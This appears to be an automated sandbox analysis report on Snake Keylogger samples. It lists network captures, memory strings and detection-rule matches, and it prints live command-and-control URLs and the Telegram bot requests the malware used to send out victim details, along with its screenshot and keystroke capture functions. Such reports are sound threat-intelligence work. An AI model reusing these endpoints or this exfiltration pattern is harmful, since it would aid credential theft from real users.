                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49694 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49697 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2009/03/2025%20/%2004:45:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:28:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 14:37:57 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 14:37:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: ckHregxJIq.exe, 00000001.00000002.1299290995.0000000002631000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 00000001.00000002.1299290995.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1345336185.00000000029A8000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20a
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043E3000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043E3000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.00000000030E6000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000003117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003251000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043E3000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003113000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003183000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000003013000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003113000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002FA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003183000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.000000000313D000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000003013000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000303A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043E3000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3733031202.00000000043E3000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004238000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.0000000004273000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000003117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003282000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000003112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49729 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                System Summary

                barindex
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
